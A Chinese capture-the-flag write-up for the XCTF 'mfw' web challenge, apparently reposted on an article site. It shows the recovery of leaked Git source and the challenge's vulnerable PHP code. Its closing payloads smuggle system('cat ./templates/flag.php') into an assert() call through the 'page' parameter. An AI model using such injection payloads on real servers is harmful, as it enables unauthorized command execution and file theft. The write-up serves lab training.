【XCTF 攻防世界】WEB 高手进阶区mfw
程序员文章站
2022-05-12 12:03:31
...
进入环境,看到about界面用到的技术git
第一时间可以想到git泄露
使用githack扫描一下python GitHack,py 网址/.git
可以看到index.php
和templates文件夹,templates文件夹是存放网页模板信息的
都已经显示在网页中
可惜flag.php没有内容
查看index.php
发现有猫腻
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>My PHP Website</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Project name</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
</ul>
</div>
</div>
</nav>
<div class="container" style="margin-top: 50px">
<?php
require_once $file;
?>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
</body>
</html>
这里将get的page变量进行一部分拼接得到file$file = "templates/" . $page . ".php";
同时还要绕过下面的语句assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
这里将$ file换成含有$ page的语句,方便查看assert("strpos("templates/" . $page . ".php", '..') === false") or die("Detected hacking attempt!");
构造payload:
assert("strpos("templates/" . 1234') or system("cat ./templates/flag.php") ;// . ".php", '..') === false") or die("Detected hacking attempt!");
或1234','567') === false and system("cat templates/flag.php") and strpos('123
推荐阅读
-
攻防世界web进阶区mfw
-
攻防世界web进阶区21-25题 write up
-
攻防世界web进阶区11-15题 write up
-
攻防世界 Misc高手进阶区 2分题 Erik-Baleog-and-Olaf
-
攻防世界 Misc高手进阶区 2分题 Ditf
-
【XCTF 攻防世界】WEB 高手进阶区 supersqli(三种方法)
-
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
-
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
-
【XCTF 攻防世界】WEB 高手进阶区 Web_php_include
-
【XCTF 攻防世界】WEB 高手进阶区mfw